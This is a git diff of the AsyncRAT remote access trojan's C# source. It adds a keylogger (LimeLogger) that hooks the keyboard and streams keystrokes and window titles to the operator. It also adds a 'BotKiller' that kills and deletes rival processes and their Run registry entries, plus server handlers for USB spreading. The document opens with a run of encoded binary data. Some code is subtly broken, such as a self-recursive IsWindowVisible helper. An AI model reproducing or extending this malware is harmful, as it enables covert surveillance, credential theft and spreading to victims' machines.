+ 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
+ gg==
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
index dcead4a..67e6fa0 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
@@ -42,8 +42,11 @@ namespace AsyncRAT_Sharp.Handle_Packet
Client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Insert(0, Client.LV);
lock (Settings.Online)
+ {
Settings.Online.Add(Client);
+ }
}));
+ HandleLogs.Addmsg($"Client {Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
}
break;
@@ -53,6 +56,26 @@ namespace AsyncRAT_Sharp.Handle_Packet
}
break;
+ case "Logs":
+ {
+ HandleLogs.Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
+ }
+ break;
+
+
+ case "BotKiller":
+ {
+ HandleLogs.Addmsg($"Client {Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
+ }
+ break;
+
+
+ case "usbSpread":
+ {
+ HandleLogs.Addmsg($"Client {Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
+ }
+ break;
+
case "Received":
{
if (Program.form1.listView1.InvokeRequired)
@@ -160,7 +183,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
{
SD.C = Client;
SD.labelfile.Text = Path.GetFileName(file);
- SD.Size = Convert.ToInt64(size);
+ SD.dSize = Convert.ToInt64(size);
SD.timer1.Start();
}
}));
@@ -191,6 +214,28 @@ namespace AsyncRAT_Sharp.Handle_Packet
break;
}
+ case "keyLogger":
+ {
+ if (Program.form1.InvokeRequired)
+ {
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ Keylogger KL = (Keylogger)Application.OpenForms["keyLogger:" + Client.ID];
+ if (KL != null)
+ {
+ KL.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Log").GetAsString());
+ }
+ else
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("Log").AsString = "false";
+ Client.BeginSend(msgpack.Encode2Bytes());
+ }
+ }));
+ }
+ break;
+ }
case "fileManager":
{
@@ -290,6 +335,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
}
}
}
+
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Costura.dll b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Costura.dll
new file mode 100644
index 0000000..aadd6de
Binary files /dev/null and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Costura.dll differ
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Costura.xml b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Costura.xml
new file mode 100644
index 0000000..7e9ca15
--- /dev/null
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Costura.xml
@@ -0,0 +1,18 @@
+
+
+
+ Costura
+
+
+
+
+ Contains methods for interacting with the Costura system.
+
+
+
+
+ Call this to Initialize the Costura system.
+
+
+
+
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/IconLib.dll b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/IconLib.dll
new file mode 100644
index 0000000..c58d15f
Binary files /dev/null and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/IconLib.dll differ
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe
index 919c2ac..432060a 100644
Binary files a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe differ
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
index 5e53dad..61829fe 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
@@ -9,7 +9,7 @@ namespace AsyncRAT_Sharp
public static List Online = new List();
public static List Blocked = new List();
public static string Port = "6606,7707,8808";
- public static readonly string Version = "AsyncRAT 0.3.0";
+ public static readonly string Version = "AsyncRAT 0.4";
public static long Sent = 0;
public static long Received = 0;
public static string Password = "NYAN CAT";
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
index a3f7457..100ee24 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
@@ -32,12 +32,9 @@ namespace AsyncRAT_Sharp.Sockets
Disconnected();
return;
}
- else
- HandleLogs.Addmsg($"Client {socket.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
-
ClientSocket = socket;
- ClientBuffer = new byte[1];
+ ClientBuffer = new byte[4];
ClientBuffersize = 0;
ClientBufferRecevied = false;
ClientMS = new MemoryStream();
@@ -63,9 +60,11 @@ namespace AsyncRAT_Sharp.Sockets
if (Recevied > 0)
{
if (ClientBufferRecevied == false)
- if (ClientBuffer[0] == 0)
+ {
+ await ClientMS.WriteAsync(ClientBuffer, 0, ClientBuffer.Length);
+ if (ClientMS.Length == 4)
{
- ClientBuffersize = Convert.ToInt64(Encoding.UTF8.GetString(ClientMS.ToArray()));
+ ClientBuffersize = BitConverter.ToInt32(ClientMS.ToArray(), 0);
ClientMS.Dispose();
ClientMS = new MemoryStream();
if (ClientBuffersize > 0)
@@ -76,7 +75,11 @@ namespace AsyncRAT_Sharp.Sockets
}
}
else
- await ClientMS.WriteAsync(ClientBuffer, 0, ClientBuffer.Length);
+ {
+ Disconnected();
+ return;
+ }
+ }
else
{
await ClientMS.WriteAsync(ClientBuffer, 0, Recevied);
@@ -95,7 +98,7 @@ namespace AsyncRAT_Sharp.Sockets
Disconnected();
return;
}
- ClientBuffer = new byte[1];
+ ClientBuffer = new byte[4];
ClientBuffersize = 0;
ClientMS.Dispose();
ClientMS = new MemoryStream();
@@ -164,7 +167,7 @@ namespace AsyncRAT_Sharp.Sockets
try
{
byte[] buffer = Settings.aes256.Encrypt((byte[])Msgs);
- byte[] buffersize = Encoding.UTF8.GetBytes(buffer.Length.ToString() + (char)0);
+ byte[] buffersize = BitConverter.GetBytes(buffer.Length);
ClientSocket.Poll(-1, SelectMode.SelectWrite);
ClientSocket.BeginSend(buffersize, 0, buffersize.Length, SocketFlags.None, EndSend, null);
diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj
index 51d5e06..a7adf87 100644
--- a/AsyncRAT-C#/Client/Client.csproj
+++ b/AsyncRAT-C#/Client/Client.csproj
@@ -1,5 +1,6 @@
+
Debug
@@ -27,6 +28,8 @@
1.0.0.%2a
false
true
+
+
x86
@@ -58,6 +61,12 @@
+
+ ..\packages\Costura.Fody.3.3.3\lib\net40\Costura.dll
+
+
+ ..\packages\IconLib\IconLib.dll
+
@@ -67,11 +76,15 @@
+
+
+
+
@@ -117,6 +130,7 @@
+
@@ -126,4 +140,12 @@
+
+
+
+ This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/FodyWeavers.xml b/AsyncRAT-C#/Client/FodyWeavers.xml
new file mode 100644
index 0000000..a5dcf04
--- /dev/null
+++ b/AsyncRAT-C#/Client/FodyWeavers.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/FodyWeavers.xsd b/AsyncRAT-C#/Client/FodyWeavers.xsd
new file mode 100644
index 0000000..44a5374
--- /dev/null
+++ b/AsyncRAT-C#/Client/FodyWeavers.xsd
@@ -0,0 +1,111 @@
+
+
+
+
+
+
+
+
+
+
+
+ A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
+
+
+
+
+ A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
+
+
+
+
+ A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
+
+
+
+
+ A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
+
+
+
+
+ The order of preloaded assemblies, delimited with line breaks.
+
+
+
+
+
+ This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
+
+
+
+
+ Controls if .pdbs for reference assemblies are also embedded.
+
+
+
+
+ Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
+
+
+
+
+ As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
+
+
+
+
+ Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
+
+
+
+
+ Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
+
+
+
+
+ A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
+
+
+
+
+ A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
+
+
+
+
+ A list of unmanaged 32 bit assembly names to include, delimited with |.
+
+
+
+
+ A list of unmanaged 64 bit assembly names to include, delimited with |.
+
+
+
+
+ The order of preloaded assemblies, delimited with |.
+
+
+
+
+
+
+
+ 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
+
+
+
+
+ A comma-separated list of error codes that can be safely ignored in assembly verification.
+
+
+
+
+ 'false' to turn off automatic generation of the XML Schema file.
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/BotKiller.cs b/AsyncRAT-C#/Client/Handle Packet/BotKiller.cs
new file mode 100644
index 0000000..8f9acbe
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/BotKiller.cs
@@ -0,0 +1,82 @@
+using System;
+using System.IO;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using Microsoft.Win32;
+using Client.MessagePack;
+using Client.Sockets;
+
+// │ Author : NYAN CAT
+// │ Name : Bot Killer v0.2
+// │ Contact : https://github.com/NYAN-x-CAT
+
+// This program Is distributed for educational purposes only.
+
+namespace Client.Handle_Packet
+{
+ class BotKiller
+ {
+ int count = 0;
+ public void RunBotKiller()
+ {
+
+ foreach (Process p in Process.GetProcesses())
+ {
+ try
+ {
+ string pName = p.MainModule.FileName;
+ if (Inspection(pName))
+ if (!IsWindowVisible(p.MainWindowHandle))
+ {
+ p.Kill();
+ RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\Run", pName);
+ RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName);
+ System.Threading.Thread.Sleep(100);
+ File.Delete(pName);
+ count += 1;
+ }
+ }
+ catch { }
+ }
+ if (count > 0)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "BotKiller";
+ msgpack.ForcePathObject("Count").AsString = count.ToString();
+ ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+ }
+
+ private bool Inspection(string payload)
+ {
+ if (payload == Process.GetCurrentProcess().MainModule.FileName) return false;
+ if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true;
+ if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true;
+ if (payload.Contains(Environment.ExpandEnvironmentVariables("%temp%"))) return true;
+ if (payload.Contains("wscript.exe")) return true;
+ if (payload.Contains(RuntimeEnvironment.GetRuntimeDirectory())) return true;
+ return false;
+ }
+
+ private static bool IsWindowVisible(string lHandle)
+ {
+ return IsWindowVisible(lHandle);
+ }
+
+ private void RegistryDelete(string regPath, string payload)
+ {
+ using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true))
+ {
+ foreach (string ValueOfName in key.GetValueNames())
+ {
+ if (key.GetValue(ValueOfName).ToString().Equals(payload))
+ key.DeleteValue(ValueOfName);
+ }
+ }
+ }
+
+ [DllImport("user32.dll")]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ static extern bool IsWindowVisible(IntPtr hWnd);
+ }
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/FileManager.cs b/AsyncRAT-C#/Client/Handle Packet/FileManager.cs
index 13ace38..5643407 100644
--- a/AsyncRAT-C#/Client/Handle Packet/FileManager.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/FileManager.cs
@@ -9,7 +9,6 @@ using System.Linq;
using System.Text;
using System.Diagnostics;
using System.Net.Sockets;
-
namespace Client.Handle_Packet
{
class FileManager
@@ -106,7 +105,7 @@ namespace Client.Handle_Packet
{
try
{
- byte[] buffersize = Encoding.UTF8.GetBytes(Msg.Length.ToString() + (char)0);
+ byte[] buffersize = BitConverter.GetBytes(Msg.Length);
Client.Poll(-1, SelectMode.SelectWrite);
Client.Send(buffersize);
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs b/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
index 1831e85..331859a 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
@@ -1,4 +1,5 @@
-using Client.MessagePack;
+using Client.Helper;
+using Client.MessagePack;
using Client.Sockets;
using System;
using System.Diagnostics;
@@ -81,6 +82,13 @@ namespace Client.Handle_Packet
}
break;
+ case "usbSpread":
+ {
+ LimeUSB limeUSB = new LimeUSB();
+ limeUSB.Run();
+ }
+ break;
+
case "remoteDesktop":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
@@ -173,6 +181,32 @@ namespace Client.Handle_Packet
}
break;
+
+ case "botKiller":
+ {
+ BotKiller botKiller = new BotKiller();
+ botKiller.RunBotKiller();
+ }
+ break;
+
+ case "keyLogger":
+ {
+ FileManager fileManager = new FileManager();
+ string isON = unpack_msgpack.ForcePathObject("isON").AsString;
+ if (isON == "true")
+ {
+ new Thread(() =>
+ {
+ LimeLogger.isON = true;
+ LimeLogger.Run();
+ }).Start();
+ }
+ else
+ {
+ LimeLogger.isON = false;
+ }
+ }
+ break;
}
}
catch { }
@@ -202,6 +236,7 @@ namespace Client.Handle_Packet
catch { }
finally
{
+ Methods.CloseMutex();
Process.Start(Del);
Environment.Exit(0);
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs b/AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs
new file mode 100644
index 0000000..51248d2
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs
@@ -0,0 +1,240 @@
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Windows.Forms;
+using Client.MessagePack;
+using System.Threading;
+namespace Client.Handle_Packet
+{
+ // │ Author : NYAN CAT
+ // │ Name : LimeLogger v0.1
+ // │ Contact : https://github.com/NYAN-x-CAT
+
+ // This program is distributed for educational purposes only.
+
+ class LimeLogger
+ {
+ public static bool isON = false;
+ public static void Run()
+ {
+ _hookID = SetHook(_proc);
+ new Thread(() =>
+ {
+ while (true)
+ {
+ Thread.Sleep(1000);
+ if (isON == false)
+ {
+ UnhookWindowsHookEx(_hookID);
+ break;
+ }
+ }
+ }).Start();
+ Application.Run();
+ }
+
+ private static IntPtr SetHook(LowLevelKeyboardProc proc)
+ {
+ using (Process curProcess = Process.GetCurrentProcess())
+ using (ProcessModule curModule = curProcess.MainModule)
+ {
+ return SetWindowsHookEx(WHKEYBOARDLL, proc,
+ GetModuleHandle(curModule.ModuleName), 0);
+ }
+ }
+
+ private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
+ {
+ try
+ {
+ if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
+ {
+ int vkCode = Marshal.ReadInt32(lParam);
+ bool CapsLock = (((ushort)GetKeyState(0x14)) & 0xffff) != 0;
+ string currentKey = KeyboardLayout((uint)vkCode);
+
+ if (CapsLock)
+ {
+ currentKey = KeyboardLayout((uint)vkCode).ToUpper();
+ }
+ else
+ {
+ currentKey = KeyboardLayout((uint)vkCode).ToLower();
+ }
+
+ if ((Keys)vkCode >= Keys.F1 && (Keys)vkCode <= Keys.F24)
+ currentKey = "[" + (Keys)vkCode + "]";
+
+ else
+ {
+ switch (((Keys)vkCode).ToString())
+ {
+ case "Space":
+ currentKey = "[SPACE]";
+ break;
+ case "Return":
+ currentKey = $"[ENTER]{Environment.NewLine}";
+ break;
+ case "escape":
+ currentKey = "[ESC]";
+ break;
+ case "LControlKey":
+ currentKey = "[CTRL]";
+ break;
+ case "RControlKey":
+ currentKey = "[CTRL]";
+ break;
+ case "RShiftKey":
+ currentKey = "[Shift]";
+ break;
+ case "LShiftKey":
+ currentKey = "[Shift]";
+ break;
+ case "Back":
+ currentKey = "[Back]";
+ break;
+ case "LWin":
+ currentKey = "[WIN]";
+ break;
+ case "Tab":
+ currentKey = "[Tab]";
+ break;
+ case "Capital":
+ if (CapsLock == true)
+ currentKey = "[CAPSLOCK: OFF]";
+ else
+ currentKey = "[CAPSLOCK: ON]";
+ break;
+
+ }
+ }
+
+ StringBuilder sb = new StringBuilder();
+ if (CurrentActiveWindowTitle == GetActiveWindowTitle())
+ {
+ sb.Append(currentKey);
+ }
+ else
+ {
+ sb.Append(Environment.NewLine);
+ sb.Append(Environment.NewLine);
+ sb.Append($"### {GetActiveWindowTitle()} ###");
+ sb.Append(Environment.NewLine);
+ sb.Append(currentKey);
+ }
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("log").AsString = sb.ToString();
+ Sockets.ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+ return CallNextHookEx(_hookID, nCode, wParam, lParam);
+ }
+ catch
+ {
+ return IntPtr.Zero;
+ }
+ }
+
+ private static string KeyboardLayout(uint vkCode)
+ {
+ try
+ {
+ StringBuilder sb = new StringBuilder();
+ byte[] vkBuffer = new byte[256];
+ if (!GetKeyboardState(vkBuffer)) return "";
+ uint scanCode = MapVirtualKey(vkCode, 0);
+ IntPtr keyboardLayout = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), out uint processId));
+ ToUnicodeEx(vkCode, scanCode, vkBuffer, sb, 5, 0, keyboardLayout);
+ return sb.ToString();
+ }
+ catch { }
+ return ((Keys)vkCode).ToString();
+ }
+
+ private static string GetActiveWindowTitle()
+ {
+ const int nChars = 256;
+ IntPtr handle = IntPtr.Zero;
+ StringBuilder Buff = new StringBuilder(nChars);
+ handle = GetForegroundWindow();
+
+ if (GetWindowText(handle, Buff, nChars) > 0)
+ {
+ CurrentActiveWindowTitle = Path.GetFileName(Buff.ToString());
+ return CurrentActiveWindowTitle;
+ }
+ else
+ {
+ return GetActiveProcessFileName();
+ }
+ }
+
+ private static string GetActiveProcessFileName()
+ {
+ try
+ {
+ string pName;
+ IntPtr hwnd = GetForegroundWindow();
+ uint pid;
+ GetWindowThreadProcessId(hwnd, out pid);
+ Process p = Process.GetProcessById((int)pid);
+ pName = Path.GetFileName(p.MainModule.FileName);
+
+ return pName;
+ }
+ catch (Exception)
+ {
+ return "???";
+ }
+ }
+
+
+ #region "Hooks & Native Methods"
+
+ private const int WH_KEYBOARD_LL = 13;
+ private const int WM_KEYDOWN = 0x0100;
+ private static LowLevelKeyboardProc _proc = HookCallback;
+ private static IntPtr _hookID = IntPtr.Zero;
+
+ [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
+ [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool UnhookWindowsHookEx(IntPtr hhk);
+ [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
+ [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ private static extern IntPtr GetModuleHandle(string lpModuleName);
+
+ private static int WHKEYBOARDLL = 13;
